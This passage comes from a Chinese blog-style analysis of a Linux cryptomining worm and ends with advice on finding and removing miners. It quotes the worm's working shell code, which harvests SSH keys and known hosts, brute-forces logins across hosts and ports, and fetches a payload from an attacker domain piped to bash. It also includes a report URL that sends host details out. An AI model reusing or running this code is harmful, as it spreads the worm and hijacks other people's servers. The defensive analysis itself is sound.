脚本还会通过nc命令，拷贝rsa公钥到你的每个用户目录下面，把你做成事实上的肉鸡，实现免密登录。关于nc这把瑞士军刀，我们也有过介绍。

for file in /home/*
do
    if test -d $file; then
        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" $file/.ssh/known_hosts); do echo exit |nc -w 1 -n -v $h 65529 && ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`||wget -q -O- http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`)|bash >/dev/null 2>&1 &' & done
        fi
    fi
done

这份脚本，还会病毒式的传播。localgo函数，通过从你的ps进程，history文件，还有hosts配置，拿到用户列表、主机列表端口、rsa密钥等，就可以批量的去尝试登录并传播这份脚本。当然，上面的xr程序会监听65529的端口，如果判断主机已经中招了，就不再继续探测。

能用65529这个端口，本身就够骚气的了，有几台机器能够达到上限65535呢？

localgo() {
  i=0
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        for sshp in $sshports; do
          i=$((i+1))
          if [ "${i}" -eq "20" ]; then
            sleep 20
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi
          #Wait 20 seconds after every 20 attempts and clean up hanging processes
          chmod +r $key
          chmod 400 $key
          echo "$user@$host $key $sshp"
          echo exit |nc -w 1 -n -v $host 65529 &&  ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "export src=sshcopy;(curl -fsSL http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`||wget -q -O- http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`)|bash >/dev/null 2>&1 &"
        done
      done
    done
  done
}

最后，脚本还不忘汇报一下，形成完美的闭环。

reurl=http://t.bb3u9.com/ln/report.asp?*`whoami`*`hostname`*${guid}*${isdocker}*${pyver}*${isxrfile}*${hashrate}*${mip}
(curl -fsSL $reurl||wget -q -O- $reurl)|bash

4. End

如果你发现你的机器不明原因发热，务必排查一下有没有挖矿程序。虽然你的服务器摆在那里也没什么用，但用着你的电费，收益却给别人，相信你一定会嫉妒的要命。那么别犹豫，kill -9送给它，别忘了清理cron。

重装是我们的秘密武器，仅次于重启。嫌麻烦的话，就这么干吧！

– EOF –

转自：https://mp.weixin.qq.com/s/oo5z7XqPBp9ZdNx8qsYkaA